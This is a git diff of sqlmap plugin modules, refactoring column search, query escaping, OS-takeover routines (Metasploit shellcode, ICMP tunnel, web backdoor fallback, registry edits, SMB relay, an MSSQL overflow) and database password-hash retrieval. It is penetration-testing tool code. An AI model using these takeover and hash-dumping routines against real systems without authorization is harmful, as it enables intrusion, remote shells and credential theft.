UPPER_CASE_DBMSES: column = column.upper() + conf.db = conf.db.upper() if conf.db else conf.db + conf.tbl = conf.tbl.upper() if conf.tbl else conf.tbl infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} - if conf.tbl: - _ = conf.tbl.split(",") - whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" - infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) + if tblCond: + if conf.tbl: + tbls = conf.tbl.split(',') + if conf.exclude: + tbls = [_ for _ in tbls if re.search(conf.exclude, _, re.I) is None] + whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in tbls) + ")" + infoMsgTbl = " for table%s '%s'" % ("s" if len(tbls) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(tbl) for tbl in tbls)) + + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if dbCond: + if conf.db: + _ = conf.db.split(',') + whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" + infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in _)) + elif conf.excludeSysDbs: + whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(msg) + else: + infoMsgDb = " across all databases" - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") - whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" - infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) - elif conf.excludeSysDbs: - whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) - else: - infoMsgDb = " across all databases" + if conf.exclude: + whereDbsQuery += " AND %s NOT LIKE '%s'" % (dbCond, re.sub(r"\.[*+]", '%', conf.exclude._original)) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) @@ -414,13 +454,13 @@ def searchColumn(self): # column(s) provided values = [] - for db in conf.db.split(","): - for tbl in conf.tbl.split(","): - values.append([db, tbl]) + for db in conf.db.split(','): + for tbl in conf.tbl.split(','): + values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)]) for db, tbl in filterPairValues(values): db = safeSQLIdentificatorNaming(db) - tbls = tbl.split(",") + tbls = tbl.split(',') if not isNoneValue(tbl) else [] for tbl in tbls: tbl = safeSQLIdentificatorNaming(tbl, True) @@ -454,8 +494,8 @@ def searchColumn(self): if not conf.db: infoMsg = "fetching number of databases with tables containing column" if colConsider == "1": - infoMsg += "s like" - infoMsg += " '%s'" % column + infoMsg += "s LIKE" + infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) query = rootQuery.blind.count @@ -465,9 +505,9 @@ def searchColumn(self): if not isNumPosStrValue(count): warnMsg = "no databases have tables containing column" if colConsider == "1": - warnMsg += "s like" - warnMsg += " '%s'" % column - logger.warn("%s%s" % (warnMsg, infoMsgTbl)) + warnMsg += "s LIKE" + warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) + logger.warning("%s%s" % (warnMsg, infoMsgTbl)) continue @@ -487,7 +527,8 @@ def searchColumn(self): if db not in foundCols[column]: foundCols[column][db] = [] else: - for db in conf.db.split(","): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): + db = safeSQLIdentificatorNaming(db) if db not in foundCols[column]: foundCols[column][db] = [] @@ -496,22 +537,25 @@ def searchColumn(self): for column, dbData in foundCols.items(): colQuery = "%s%s" % (colCond, colCondParam) - colQuery = colQuery % column + colQuery = colQuery % unsafeSQLIdentificatorNaming(column) for db in dbData: - db = safeSQLIdentificatorNaming(db) conf.db = origDb conf.tbl = origTbl infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), db) + infoMsg += "s LIKE" + infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) query = rootQuery.blind.count2 - query = query % db - query += " AND %s" % colQuery + if not re.search(r"(?i)%s\Z" % METADB_SUFFIX, db or ""): + query = query % unsafeSQLIdentificatorNaming(db) + query += " AND %s" % colQuery + else: + query = query % colQuery + query += whereTblsQuery count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) @@ -519,10 +563,10 @@ def searchColumn(self): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" - warnMsg += " '%s' " % column - warnMsg += "in database '%s'" % db - logger.warn(warnMsg) + warnMsg += "s LIKE" + warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) + warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.warning(warnMsg) continue @@ -530,9 +574,17 @@ def searchColumn(self): for index in indexRange: query = rootQuery.blind.query2 - query = query % db - query += " AND %s" % colQuery - query += whereTblsQuery + + if re.search(r"(?i)%s\Z" % METADB_SUFFIX, db or ""): + query = query % (colQuery + whereTblsQuery) + elif query.endswith("'%s')"): + query = query[:-1] + " AND %s)" % (colQuery + whereTblsQuery) + elif " ORDER BY " in query: + query = query.replace(" ORDER BY ", " AND %s ORDER BY " % (colQuery + whereTblsQuery)) + else: + query += " AND %s" % (colQuery + whereTblsQuery) + + query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) query = agent.limitQuery(index, query) tbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) @@ -568,10 +620,10 @@ def searchColumn(self): else: warnMsg = "no databases have tables containing any of the " warnMsg += "provided columns" - logger.warn(warnMsg) + logger.warning(warnMsg) def search(self): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: for item in ('db', 'tbl', 'col'): if getattr(conf, item, None): setattr(conf, item, getattr(conf, item).upper()) diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py index 05b658d0095..5da7b985298 100644 --- a/plugins/generic/syntax.py +++ b/plugins/generic/syntax.py @@ -1,15 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re +from lib.core.common import Backend +from lib.core.convert import getBytes +from lib.core.data import conf +from lib.core.enums import DBMS from lib.core.exception import SqlmapUndefinedMethod -class Syntax: +class Syntax(object): """ This class defines generic syntax functionalities for plugins. """ @@ -22,8 +26,18 @@ def _escape(expression, quote=True, escaper=None): retVal = expression if quote: - for item in re.findall(r"'[^']*'+", expression, re.S): - retVal = retVal.replace(item, escaper(item[1:-1])) + for item in re.findall(r"'[^']*'+", expression): + original = item[1:-1] + if original: + if Backend.isDbms(DBMS.SQLITE) and "X%s" % item in expression: + continue + if re.search(r"\[(SLEEPTIME|RAND)", original) is None: # e.g. '[SLEEPTIME]' marker + replacement = escaper(original) if not conf.noEscape else original + + if replacement != original: + retVal = retVal.replace(item, replacement) + elif len(original) != len(getBytes(original)) and "n'%s'" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL): + retVal = retVal.replace("'%s'" % original, "n'%s'" % original) else: retVal = escaper(expression) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 412802cc064..eda399e614c 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -1,25 +1,30 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os from lib.core.common import Backend -from lib.core.common import isTechniqueAvailable +from lib.core.common import getSafeExString +from lib.core.common import isDigit +from lib.core.common import isStackingAvailable +from lib.core.common import openFile from lib.core.common import readInput from lib.core.common import runningAsAdmin from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import OS -from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapNotVulnerableException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUnsupportedDBMSException from lib.takeover.abstraction import Abstraction @@ -27,23 +32,21 @@ from lib.takeover.metasploit import Metasploit from lib.takeover.registry import Registry -from plugins.generic.misc import Miscellaneous - -class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): +class Takeover(Abstraction, Metasploit, ICMPsh, Registry): """ This class defines generic OS takeover functionalities for plugins. """ def __init__(self): - self.cmdTblName = "sqlmapoutput" + self.cmdTblName = ("%soutput" % conf.tablePrefix) self.tblField = "data" Abstraction.__init__(self) def osCmd(self): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: + if isStackingAvailable() or conf.direct: web = False - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): + elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command execution" logger.info(infoMsg) @@ -63,9 +66,9 @@ def osCmd(self): self.cleanup(web=web) def osShell(self): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: + if isStackingAvailable() or conf.direct: web = False - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): + elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command prompt" logger.info(infoMsg) @@ -77,7 +80,20 @@ def osShell(self): raise SqlmapNotVulnerableException(errMsg) self.getRemoteTempPath() - self.initEnv(web=web) + + try: + self.initEnv(web=web) + except SqlmapFilePathException: + if not web and not conf.direct: + infoMsg = "falling back to web backdoor method..." + logger.info(infoMsg) + + web = True + kb.udfFail = True + + self.initEnv(web=web) + else: + raise if not web or (web and self.webBackdoorUrl is not None): self.shell() @@ -87,6 +103,8 @@ def osShell(self): def osPwn(self): goUdf = False + fallbackToWeb = False + setupSuccess = False self.checkDbmsOs() @@ -94,21 +112,17 @@ def osPwn(self): msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\n[2] ICMP: icmpsh - ICMP tunneling" - valids = (1, 2) while True: - tunnel = readInput(msg, default=1) + tunnel = readInput(msg, default='1') - if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids: + if isDigit(tunnel) and int(tunnel) in (1, 2): tunnel = int(tunnel) break - elif isinstance(tunnel, int) and tunnel in valids: - break - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) + warnMsg = "invalid value, valid values are '1' and '2'" + logger.warning(warnMsg) else: tunnel = 1 @@ -127,20 +141,23 @@ def osPwn(self): raise SqlmapMissingPrivileges(errMsg) try: - from impacket import ImpactDecoder - from impacket import ImpactPacket + __import__("impacket") except ImportError: errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg += "in order to run icmpsh master. You can get it at " - errMsg += "http://code.google.com/p/impacket/downloads/list" + errMsg += "https://github.com/SecureAuthCorp/impacket" raise SqlmapMissingDependence(errMsg) - sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" + filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" - if os.path.exists(sysIgnoreIcmp): - fp = open(sysIgnoreIcmp, "wb") - fp.write("1") - fp.close() + if os.path.exists(filename): + try: + with openFile(filename, "wb") as f: + f.write("1") + except IOError as ex: + errMsg = "there has been a file opening/writing error " + errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) else: errMsg = "you need to disable ICMP replies by your machine " errMsg += "system-wide. For example run on Linux/Unix:\n" @@ -153,10 +170,11 @@ def osPwn(self): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): self.sysUdfs.pop("sys_bineval") - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: + self.getRemoteTempPath() + + if isStackingAvailable() or conf.direct: web = False - self.getRemoteTempPath() self.initEnv(web=web) if tunnel == 1: @@ -164,51 +182,65 @@ def osPwn(self): msg = "how do you want to execute the Metasploit shellcode " msg += "on the back-end database underlying operating system?" msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" - msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" + msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)" while True: - choice = readInput(msg, default=1) + choice = readInput(msg, default='1') - if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): + if isDigit(choice) and int(choice) in (1, 2): choice = int(choice) break - elif isinstance(choice, int) and choice in (1, 2): - break - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) + warnMsg = "invalid value, valid values are '1' and '2'" + logger.warning(warnMsg) if choice == 1: goUdf = True if goUdf: exitfunc = "thread" + setupSuccess = True else: exitfunc = "process" self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") if not goUdf: - self.uploadShellcodeexec() + setupSuccess = self.uploadShellcodeexec(web=web) + + if setupSuccess is not True: + if Backend.isDbms(DBMS.MYSQL): + fallbackToWeb = True + else: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) + + if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc: + debugMsg = "by default MySQL on Windows runs as SYSTEM " + debugMsg += "user, no need to privilege escalate" + logger.debug(debugMsg) - if Backend.isOs(OS.WINDOWS) and conf.privEsc: - if Backend.isDbms(DBMS.MYSQL): - debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, no need to privilege escalate" - logger.debug(debugMsg) elif tunnel == 2: - self.uploadIcmpshSlave(web=web) - self.icmpPwn() + setupSuccess = self.uploadIcmpshSlave(web=web) - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): + if setupSuccess is not True: + if Backend.isDbms(DBMS.MYSQL): + fallbackToWeb = True + else: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) + + if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): web = True - infoMsg = "going to use a web backdoor to establish the tunnel" + if fallbackToWeb: + infoMsg = "falling back to web backdoor to establish the tunnel" + else: + infoMsg = "going to use a web backdoor to establish the tunnel" logger.info(infoMsg) - self.initEnv(web=web) + self.initEnv(web=web, forceInit=fallbackToWeb) if self.webBackdoorUrl: if not Backend.isOs(OS.WINDOWS) and conf.privEsc: @@ -219,24 +251,31 @@ def osPwn(self): warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" - logger.warn(warnMsg) - - self.getRemoteTempPath() + logger.warning(warnMsg) if tunnel == 1: self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") - self.uploadShellcodeexec(web=web) + setupSuccess = self.uploadShellcodeexec(web=web) + + if setupSuccess is not True: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) + elif tunnel == 2: - self.uploadIcmpshSlave(web=web) - self.icmpPwn() - else: - errMsg = "unable to prompt for an out-of-band session because " - errMsg += "stacked queries SQL injection is not supported" - raise SqlmapNotVulnerableException(errMsg) + setupSuccess = self.uploadIcmpshSlave(web=web) + + if setupSuccess is not True: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) - if tunnel == 1: - if not web or (web and self.webBackdoorUrl is not None): + if setupSuccess: + if tunnel == 1: self.pwn(goUdf) + elif tunnel == 2: + self.icmpPwn() + else: + errMsg = "unable to prompt for an out-of-band session" + raise SqlmapNotVulnerableException(errMsg) if not conf.cleanup: self.cleanup(web=web) @@ -250,7 +289,7 @@ def osSmb(self): errMsg += "relay attack" raise SqlmapUnsupportedDBMSException(errMsg) - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): errMsg = "on this back-end DBMS it is only possible to " errMsg += "perform the SMB relay attack if stacked " @@ -287,12 +326,12 @@ def osSmb(self): printWarn = False if printWarn: - logger.warn(warnMsg) + logger.warning(warnMsg) self.smb() def osBof(self): - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: return if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")): @@ -309,14 +348,8 @@ def osBof(self): msg = "this technique is likely to DoS the DBMS process, are you " msg += "sure that you want to carry with the exploit? [y/N] " - inp = readInput(msg, default="N") - - if inp and inp[0].lower() == "y": - dos = True - else: - dos = False - if dos: + if readInput(msg, default='N', boolean=True): self.initEnv(mandatory=False, detailed=True) self.getRemoteTempPath() self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) @@ -328,7 +361,7 @@ def uncPathRequest(self): raise SqlmapUndefinedMethod(errMsg) def _regInit(self): - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: return self.checkDbmsOs() @@ -345,7 +378,7 @@ def regRead(self): self._regInit() if not conf.regKey: - default = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" + default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" msg = "which registry key do you want to read? [%s] " % default regKey = readInput(msg, default=default) else: @@ -358,7 +391,7 @@ def regRead(self): else: regVal = conf.regVal - infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal) logger.info(infoMsg) return self.readRegKey(regKey, regVal, True) @@ -403,7 +436,7 @@ def regAdd(self): else: regType = conf.regType - infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg += "with data '%s'. " % regData infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." @@ -435,13 +468,12 @@ def regDel(self): regVal = conf.regVal message = "are you sure that you want to delete the Windows " - message += "registry path '%s\%s? [y/N] " % (regKey, regVal) - output = readInput(message, default="N") + message += "registry path '%s\\%s? [y/N] " % (regKey, regVal) - if output and output[0] not in ("Y", "y"): + if not readInput(message, default='N', boolean=True): return - infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) + infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal) infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." logger.info(infoMsg) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 438c2929b61..ccd1b7747e4 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -12,38 +12,45 @@ from lib.core.common import Backend from lib.core.common import filterPairValues from lib.core.common import getLimitRange -from lib.core.common import getUnicode from lib.core.common import isAdminFromPrivileges +from lib.core.common import isDBMSVersionAtLeast from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue +from lib.core.common import isNullValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parsePasswordHash -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import unArrayizeValue -from lib.core.convert import hexencode +from lib.core.compat import xrange +from lib.core.convert import encodeHex +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DB2_PRIVS +from lib.core.dicts import FIREBIRD_PRIVS +from lib.core.dicts import INFORMIX_PRIVS from lib.core.dicts import MYSQL_PRIVS from lib.core.dicts import PGSQL_PRIVS -from lib.core.dicts import FIREBIRD_PRIVS -from lib.core.dicts import DB2_PRIVS from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import FORK from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import CURRENT_USER +from lib.core.settings import PLUS_ONE_DBMSES from lib.core.threads import getCurrentThreadData from lib.request import inject from lib.utils.hash import attackCachedUsersPasswords from lib.utils.hash import storeHashesToFile from lib.utils.pivotdumptable import pivotDumpTable +from thirdparty.six.moves import zip as _zip -class Users: +class Users(object): """ This class defines users' enumeration functionalities for plugins. """ @@ -71,16 +78,22 @@ def isDba(self, user=None): infoMsg = "testing if current user is DBA" logger.info(infoMsg) + query = None + if Backend.isDbms(DBMS.MYSQL): self.getCurrentUser() - query = queries[Backend.getIdentifiedDbms()].is_dba.query % (kb.data.currentUser.split("@")[0] if kb.data.currentUser else None) + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + kb.data.isDba = "root" in (kb.data.currentUser or "") + elif kb.data.currentUser: + query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None: query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user else: query = queries[Backend.getIdentifiedDbms()].is_dba.query - query = agent.forgeCaseStatement(query) - kb.data.isDba = inject.checkBooleanExpression(query) + if query: + query = agent.forgeCaseStatement(query) + kb.data.isDba = inject.checkBooleanExpression(query) or False return kb.data.isDba @@ -92,42 +105,57 @@ def getUsers(self): condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) + condition |= (Backend.isDbms(DBMS.H2) and not isDBMSVersionAtLeast("2")) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if condition: + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.inband.query3 + elif condition: query = rootQuery.inband.query2 else: query = rootQuery.inband.query + values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - kb.data.cachedUsers = arrayizeValue(values) + kb.data.cachedUsers = [] + for value in arrayizeValue(values): + value = unArrayizeValue(value) + if not isNoneValue(value): + kb.data.cachedUsers.append(value) if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database users" logger.info(infoMsg) - if condition: + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.blind.count3 + elif condition: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - if not isNumPosStrValue(count): + if count == 0: + return kb.data.cachedUsers + elif not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" raise SqlmapNoneDataException(errMsg) - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") + elif Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.blind.query3 % index elif condition: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index + user = unArrayizeValue(inject.getValue(query, union=False, error=False)) if user: @@ -144,7 +172,7 @@ def getPasswordHashes(self): rootQuery = queries[Backend.getIdentifiedDbms()].passwords - if conf.user == "CU": + if conf.user == CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() @@ -154,18 +182,18 @@ def getPasswordHashes(self): conf.user = conf.user.upper() if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] - users = filter(None, users) + users = [_ for _ in users if _] if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): @@ -180,13 +208,12 @@ def getPasswordHashes(self): query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): - randStr = randomStr() getCurrentThreadData().disableStdOut = True - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): + for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: @@ -196,6 +223,11 @@ def getPasswordHashes(self): else: values = inject.getValue(query, blind=False, time=False) + if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): + values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) + elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)): + values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) + for user, password in filterPairValues(values): if not user or user == " ": continue @@ -208,12 +240,14 @@ def getPasswordHashes(self): kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: + fallback = False + if not len(users): users = self.getUsers() if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] @@ -221,14 +255,13 @@ def getPasswordHashes(self): if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True - randStr = randomStr() query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): - password = "0x%s" % hexencode(password).upper() + for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): + password = "0x%s" % encodeHex(password, binary=False).upper() if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] @@ -240,32 +273,45 @@ def getPasswordHashes(self): retrievedUsers = set() for user in users: + user = unArrayizeValue(user) + if user in retrievedUsers: continue - infoMsg = "fetching number of password hashes " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.count2 % user + if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of password hashes " + infoMsg += "for user '%s'" % user + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of password " - warnMsg += 